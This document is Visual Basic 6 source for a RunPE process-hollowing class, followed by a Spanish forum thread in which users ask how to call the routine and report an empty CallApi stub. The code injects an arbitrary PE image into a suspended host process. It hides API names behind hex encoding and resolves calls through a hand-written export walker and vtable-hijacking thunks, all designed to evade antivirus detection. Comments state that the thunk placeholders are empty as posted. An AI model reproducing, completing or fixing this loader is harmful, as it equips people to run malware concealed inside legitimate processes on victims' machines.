' RunPE variants on this page: CreateProcessW(CREATE_SUSPENDED) ->
' NtUnmapViewOfSection -> VirtualAllocEx(PAGE_EXECUTE_READWRITE) ->
' NtWriteVirtualMemory (headers, then sections) -> NtGetContextThread ->
' NtSetContextThread -> NtResumeThread. Here the PE headers are parsed into
' the Types above, every API address comes from the module's own
' GetProcAddress, and each DLL/export name is a hex string decoded by
' nlfpkgnrj (the plain-text comment above each 'KPC line gives the name).
' Parameters:
'   bvBuff - raw PE image; MZ and PE signatures are checked.
'   sHost  - host executable; when empty, this process's own path is used
'            (GetModuleFileNameW on App.hInstance into a 260-char buffer).
'   hProc  - receives the new process handle.
' Returns True after the sequence; False if Class_Initialize failed
' (c_bInit) or a signature check fails.
' Review notes: no Invoke result is checked - a failed CreateProcessW leaves
' tPROCESS_INFORMATION zeroed and every later call works on handle 0; bvBuff
' indices (e_lfanew, PointerToRawData) are not bounds-checked and, as there
' is no On Error here, a malformed image raises a VB subscript error; no
' relocation processing exists, so the image must be usable at ImageBase.
' As posted, Invoke's PATCH1/PATCH2 placeholders are empty (see the
' constants above), so the calls made here do not reach the intended APIs.
Public Function RunPE(ByRef bvBuff() As Byte, Optional sHost As String, Optional ByRef hProc As Long) As Boolean

Dim i As Long

Dim tIMAGE_DOS_HEADER As IMAGE_DOS_HEADER

Dim tIMAGE_NT_HEADERS As IMAGE_NT_HEADERS

Dim tIMAGE_SECTION_HEADER As IMAGE_SECTION_HEADER

Dim tSTARTUPINFO As STARTUPINFO

Dim tPROCESS_INFORMATION As PROCESS_INFORMATION

Dim tCONTEXT As CONTEXT

Dim lKernel As Long

Dim lNTDll As Long

Dim lMod As Long

' Class_Initialize must have resolved the kernel base and LoadLibraryW.
If Not c_bInit Then Exit Function

Call CpyMem(tIMAGE_DOS_HEADER, bvBuff(0), SIZE_DOS_HEADER)

If Not tIMAGE_DOS_HEADER.e_magic = IMAGE_DOS_SIGNATURE Then

Exit Function

End If

Call CpyMem(tIMAGE_NT_HEADERS, bvBuff(tIMAGE_DOS_HEADER.e_lfanew), SIZE_NT_HEADERS)

If Not tIMAGE_NT_HEADERS.Signature = IMAGE_NT_SIGNATURE Then

Exit Function

End If

'kernel32

lKernel = LoadLibrary(nlfpkgnrj("6B65726E656C3332")) 'KPC

'ntdll

lNTDll = LoadLibrary(nlfpkgnrj("6E74646C6C")) 'KPC

' No host given: hollow a copy of this executable. The 260-char buffer is
' passed on to CreateProcessW as is (its content is NUL-terminated by
' GetModuleFileNameW, the VB string keeps length 260).
If sHost = vbNullString Then

sHost = Space(260)

'GetModuleFileNameW

lMod = GetProcAddress(lKernel, nlfpkgnrj("4765744D6F64756C6546696C654E616D6557")) 'KPC

Invoke lMod, App.hInstance, StrPtr(sHost), 260

End If

With tIMAGE_NT_HEADERS.OptionalHeader

tSTARTUPINFO.cb = Len(tSTARTUPINFO)

'CreateProcessW

lMod = GetProcAddress(lKernel, nlfpkgnrj("43726561746550726F6365737357")) 'KPC

Invoke lMod, 0, StrPtr(sHost), 0, 0, 0, CREATE_SUSPENDED, 0, 0, VarPtr(tSTARTUPINFO), VarPtr(tPROCESS_INFORMATION)

'NtUnmapViewOfSection

lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E74556E6D6170566965774F6653656374696F6E")) 'KPC

Invoke lMod, tPROCESS_INFORMATION.hProcess, .ImageBase

'VirtualAllocEx

lMod = GetProcAddress(lKernel, nlfpkgnrj("5669727475616C416C6C6F634578")) 'KPC

Invoke lMod, tPROCESS_INFORMATION.hProcess, .ImageBase, .SizeOfImage, MEM_COMMIT Or MEM_RESERVE, PAGE_EXECUTE_READWRITE

'NtWriteVirtualMemory

lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E7457726974655669727475616C4D656D6F7279")) 'KPC

Invoke lMod, tPROCESS_INFORMATION.hProcess, .ImageBase, VarPtr(bvBuff(0)), .SizeOfHeaders, 0

' lMod still holds NtWriteVirtualMemory for the section loop; the section
' table starts right after the NT headers, one &H28-byte entry per section.
For i = 0 To tIMAGE_NT_HEADERS.FileHeader.NumberOfSections - 1

CpyMem tIMAGE_SECTION_HEADER, bvBuff(tIMAGE_DOS_HEADER.e_lfanew + SIZE_NT_HEADERS + SIZE_IMAGE_SECTION_HEADER * i), Len(tIMAGE_SECTION_HEADER)

Invoke lMod, tPROCESS_INFORMATION.hProcess, .ImageBase + tIMAGE_SECTION_HEADER.VirtualAddress, VarPtr(bvBuff(tIMAGE_SECTION_HEADER.PointerToRawData)), tIMAGE_SECTION_HEADER.SizeOfRawData, 0

Next i

tCONTEXT.ContextFlags = CONTEXT_FULL

'NtGetContextThread

lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E74476574436F6E74657874546872656164")) 'KPC

Invoke lMod, tPROCESS_INFORMATION.hThread, VarPtr(tCONTEXT)

'NtWriteVirtualMemory

lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E7457726974655669727475616C4D656D6F7279")) 'KPC

' NOTE(review): assumes Ebx of the suspended main thread holds the PEB
' address (PEB+8 = ImageBaseAddress) - convention, not verified here.
Invoke lMod, tPROCESS_INFORMATION.hProcess, tCONTEXT.Ebx + 8, VarPtr(.ImageBase), 4, 0

' Eax = new entry point; presumably the register the thread start-up path
' jumps through - not verified here.
tCONTEXT.Eax = .ImageBase + .AddressOfEntryPoint

'NtSetContextThread

lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E74536574436F6E74657874546872656164")) 'KPC

Invoke lMod, tPROCESS_INFORMATION.hThread, VarPtr(tCONTEXT)

'NtResumeThread

lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E74526573756D65546872656164")) 'KPC

Invoke lMod, tPROCESS_INFORMATION.hThread, 0

hProc = tPROCESS_INFORMATION.hProcess

End With

RunPE = True

End Function

' Calls the function at address lMod with Params (pushed last-to-first,
' i.e. stdcall order) by building a thunk from THUNK_APICALL and executing
' it through PatchCall.
' Parameters:
'   lMod   - absolute address of the function to call (0 -> returns 0).
'   Params - arguments, each coerced with CLng and rendered by GetLong as
'            a "68" + little-endian imm32 PUSH.
' Returns the thunk's result (the callee's return value when the thunk is
' correctly patched).
' The displacement in lPtr is computed for a CALL whose end lies
' (UBound(Params) + 3) * 5 bytes into c_bvASM; this depends on the exact
' layout of THUNK_APICALL and the PATCH markers. As posted PATCH1 and
' PATCH2 are empty strings, so both Replace calls leave sData unchanged and
' the unpatched stub is what gets executed.
Public Function Invoke(ByVal lMod As Long, ParamArray Params()) As Long

Dim lPtr As Long

Dim i As Long

Dim sData As String

Dim sParams As String

If lMod = 0 Then Exit Function

' Build the PUSH sequence, last parameter first.
For i = UBound(Params) To 0 Step -1

sParams = sParams & "68" & GetLong(CLng(Params(i)))

Next

' Address of the thunk, advanced past the pushes; then turned into the
' rel32 displacement (the extra -5 is the CALL instruction itself).
lPtr = VarPtr(c_bvASM(0))

lPtr = lPtr + (UBound(Params) + 2) * 5

lPtr = lMod - lPtr - 5

' Splice the parameters and displacement into the thunk template.
sData = THUNK_APICALL

sData = Replace(sData, PATCH1, sParams)

sData = Replace(sData, PATCH2, GetLong(lPtr))

Call PutThunk(sData)

Invoke = PatchCall

End Function

Private Function GetLong(ByVal lData As Long) As String

' Renders lData as eight hex digits in memory (little-endian) byte order,
' e.g. &H12345678 -> "78563412". This is the immediate form Invoke splices
' into the thunk. Each byte is zero-padded to two digits.

Dim abRaw(3) As Byte

Dim nIdx As Long

Dim sByte As String

Dim sHex As String

CpyMem abRaw(0), lData, &H4

For nIdx = 0 To 3

sByte = Hex$(abRaw(nIdx))

If Len(sByte) < 2 Then sByte = "0" & sByte

sHex = sHex & sByte

Next nIdx

GetLong = sHex

End Function

' Decodes sThunk (two hex characters per byte) into c_bvASM starting at
' index 0. Bytes beyond Len(sThunk) / 2 keep whatever the previous thunk
' left there. The caller must keep Len(sThunk) / 2 <= 256 (c_bvASM is
' &HFF + 1 bytes); there is no check here. i steps by 2 over the 0-based
' position while Mid$ is 1-based, hence Mid$(sThunk, i + 1, 2).
Private Sub PutThunk(ByVal sThunk As String)

Dim i As Long

For i = 0 To Len(sThunk) - 1 Step 2

c_bvASM((i / 2)) = CByte("&h" & Mid$(sThunk, i + 1, 2))

Next i

End Sub

' Executes the thunk currently in c_bvASM by temporarily hijacking this
' object's COM vtable: reads the vtable pointer from ObjPtr(Me), takes the
' slot at +&H1C (zDoNotCall's slot), saves the original entry, points the
' slot at c_bvASM, calls zDoNotCall so the dispatch lands in the thunk, and
' restores the slot afterwards. Returns whatever the thunk returns.
' The module header's "Compile : P-Code !!!" note applies here: whether the
' zDoNotCall call goes through the vtable depends on how the VB runtime
' dispatches it. The slot is not restored if the thunk never returns.
Private Function PatchCall() As Long

' c_lVTE = *(ObjPtr(Me)) + &H1C : address of zDoNotCall's vtable slot.
CpyMem c_lVTE, ByVal ObjPtr(Me), &H4

c_lVTE = c_lVTE + &H1C

' Save the original entry, then redirect the slot to the thunk bytes.
CpyMem c_lOldVTE, ByVal c_lVTE, &H4

CpyMem ByVal c_lVTE, VarPtr(c_bvASM(0)), &H4

PatchCall = zDoNotCall

' Put the vtable back.
CpyMem ByVal c_lVTE, c_lOldVTE, &H4

End Function

Public Function GetMod(ByVal sLib As String, ByVal sProc As String) As Long

' Convenience wrapper: loads sLib through this module's own LoadLibrary and
' resolves sProc with its own export-table walker GetProcAddress. A failed
' LoadLibrary (0) is not checked and is passed straight to GetProcAddress,
' which dereferences it.

Dim hLib As Long

hLib = Me.LoadLibrary(sLib)

GetMod = Me.GetProcAddress(hLib, sProc)

End Function

Public Function LoadLibrary(ByVal sLib As String) As Long

' Loads sLib through the LoadLibraryW address resolved in Class_Initialize
' (c_lLoadLib). The name is handed over as a pointer to a NUL-terminated
' copy. Returns the module handle, or 0 when c_lLoadLib is 0 (Invoke exits
' early) or the load fails.

Dim sName As String

sName = sLib & vbNullChar

LoadLibrary = Invoke(c_lLoadLib, StrPtr(sName))

End Function

' True once Class_Initialize has resolved both the kernel base and
' LoadLibraryW; RunPE exits immediately while this is False.
Public Property Get Initialized() As Boolean

Initialized = c_bInit

End Property

' VB class constructor. Runs THUNK_KERNELBASE through PatchCall and keeps
' the result in c_lKrnl, then resolves "LoadLibraryW" from that module with
' the custom GetProcAddress. c_bInit becomes True only if both values are
' non-zero. Declared Public here although the IDE generates it as Private -
' confirm it still fires as the constructor in this form.
Public Sub Class_Initialize()

Call PutThunk(THUNK_KERNELBASE)

c_lKrnl = PatchCall

If Not c_lKrnl = 0 Then

' The only plain-text export name in this module.
c_lLoadLib = GetProcAddress(c_lKrnl, "LoadLibraryW")

If Not c_lLoadLib = 0 Then

c_bInit = True

End If

End If

End Sub

' Re-implementation of GetProcAddress that walks lMod's export table in
' memory instead of importing kernel32!GetProcAddress. Steps: validate the
' MZ/PE signatures, locate the export directory through DataDirectory(0),
' scan the name table for sProc (case-sensitive, via StringFromPtr), map
' the name index through the ordinal table to the function RVA. If the
' resulting address lies inside the export directory itself it is a
' forwarder string ("DLL.Export"): ResolveForward loads that DLL and the
' lookup recurses with the new module and name.
' Parameters:
'   lMod  - module base address (not validated before CpyMem reads it).
'   sProc - exported name to find.
' Returns the function address, or 0 when the headers are invalid, the name
' is not exported, or a forwarder cannot be resolved.
' Caveat: the export directory is located relative to lMod, but the name,
' ordinal and function tables are read relative to lBase =
' OptionalHeader.ImageBase. The two agree only when the module is loaded at
' its preferred base; when it has been relocated (e.g. ASLR), every pointer
' derived from lBase is wrong.
Public Function GetProcAddress(ByVal lMod As Long, ByVal sProc As String) As Long

Dim tIMAGE_DOS_HEADER As IMAGE_DOS_HEADER

Dim tIMAGE_NT_HEADERS As IMAGE_NT_HEADERS

Dim tIMAGE_EXPORT_DIRECTORY As IMAGE_EXPORT_DIRECTORY

Call CpyMem(tIMAGE_DOS_HEADER, ByVal lMod, SIZE_DOS_HEADER)

If Not tIMAGE_DOS_HEADER.e_magic = IMAGE_DOS_SIGNATURE Then

Exit Function

End If

Call CpyMem(tIMAGE_NT_HEADERS, ByVal lMod + tIMAGE_DOS_HEADER.e_lfanew, SIZE_NT_HEADERS)

If Not tIMAGE_NT_HEADERS.Signature = IMAGE_NT_SIGNATURE Then

Exit Function

End If

Dim lVAddress As Long

Dim lVSize As Long

Dim lBase As Long

' lVAddress..lVSize is the export directory's address range; addresses that
' fall inside it are forwarder strings rather than code.
With tIMAGE_NT_HEADERS.OptionalHeader

lVAddress = lMod + .DataDirectory(0).VirtualAddress

lVSize = lVAddress + .DataDirectory(0).Size

lBase = .ImageBase

End With

Call CpyMem(tIMAGE_EXPORT_DIRECTORY, ByVal lVAddress, SIZE_EXPORT_DIRECTORY)

Dim i As Long

Dim lFunctAdd As Long

Dim lNameAdd As Long

Dim lNumbAdd As Long

With tIMAGE_EXPORT_DIRECTORY

' Linear scan of the name table (4-byte RVAs).
For i = 0 To .NumberOfNames - 1

CpyMem lNameAdd, ByVal lBase + .lpAddressOfNames + i * 4, 4

If StringFromPtr(lBase + lNameAdd) = sProc Then

' Name index -> 2-byte ordinal -> 4-byte function RVA.
CpyMem lNumbAdd, ByVal lBase + .lpAddressOfNameOrdinals + i * 2, 2

CpyMem lFunctAdd, ByVal lBase + .lpAddressOfFunctions + lNumbAdd * 4, 4

GetProcAddress = lFunctAdd + lBase

' Forwarded export: ResolveForward rewrites lMod and sProc (both ByRef),
' then the lookup recurses into the target module.
If GetProcAddress >= lVAddress And _

GetProcAddress <= lVSize Then

Call ResolveForward(GetProcAddress, lMod, sProc)

If Not lMod = 0 Then

GetProcAddress = GetProcAddress(lMod, sProc)

Else

GetProcAddress = 0

End If

End If

Exit Function

End If

Next

End With

End Function

Private Function ResolveForward( _

ByVal lAddress As Long, _

ByRef lLib As Long, _

ByRef sMod As String)

' Resolves an export-forwarder entry. lAddress points to a "DLL.Export"
' ANSI string; on success lLib receives the handle of the named DLL (via
' this module's LoadLibrary) and sMod the export name, so GetProcAddress
' can retry. If the string contains no ".", both arguments are left as
' they were. No return value (declared without As).

Dim sForward As String

Dim asParts() As String

sForward = StringFromPtr(lAddress)

If InStr(1, sForward, ".") = 0 Then Exit Function

asParts = Split(sForward, ".")

lLib = LoadLibrary(asParts(0))

sMod = asParts(1)

End Function

Private Function StringFromPtr( _

ByVal lAddress As Long) As String

' Reads a NUL-terminated ANSI string one byte at a time from lAddress
' (through CpyMem) and returns it as a VB string. There is no length limit:
' an unterminated buffer is read until a 0 byte happens to be found or the
' read faults.

Dim bCur As Byte

Dim sOut As String

CpyMem bCur, ByVal lAddress, 1

Do While bCur <> 0

sOut = sOut & Chr$(bCur)

lAddress = lAddress + 1

CpyMem bCur, ByVal lAddress, 1

Loop

StringFromPtr = sOut

End Function

Private Function nlfpkgnrj(ByVal sData As String) As String

' Hex-pair decoder: "6B65726E656C3332" -> "kernel32". All DLL and export
' names in RunPE are stored in this form (each call site is marked 'KPC and
' preceded by a comment giving the plain name), so the plain names do not
' appear as string literals. An odd trailing character is decoded alone by
' Val.

Dim nPos As Long

Dim sOut As String

For nPos = 1 To Len(sData) Step 2

sOut = sOut & Chr$(Val("&H" & Mid$(sData, nPos, 2)))

Next nPos

nlfpkgnrj = sOut

End Function[/lenguaje]

Saludos ;D

¿Alguien me puede echar una mano para hacer la llamada del runpe de f0rce? Gracias

 
¿Alguien me puede echar una mano para hacer la llamada del runpe de f0rce? Gracias
No parece muy difícil.

La declaración es esta:

Public Function RunPE(ByRef bvBuff() As Byte, ByVal sHost As String, Optional ByVal sParams As String, Optional ByRef hProcess As Long) As Long

Los últimos dos parámetros son opcionales y los dos primeros son los mismos que en los otros runpe.

 
La declaración no, la llamada en el Sub Main. Gracias

 
La declaración no, la llamada en el Sub Main. Gracias
H1D0L1S1S, para saber cómo llamarlo tenés que mirar la declaración; no hay forma de adivinarlo.

Por eso mismo fue la respuesta de arriba.

Si uno mira los parámetros que necesita y sus tipos, se da cuenta de cómo llamarlo.

 
Re: Recoleccion de RunPe

Oye brother, perdona que pregunte 6 meses después... Pero en el Runpe de f0rce, la función CallApi() está vacía xD

Code:
>Public Function CallApi()

End Function
Échame una mano, ¿no, bro?

Saludos.

 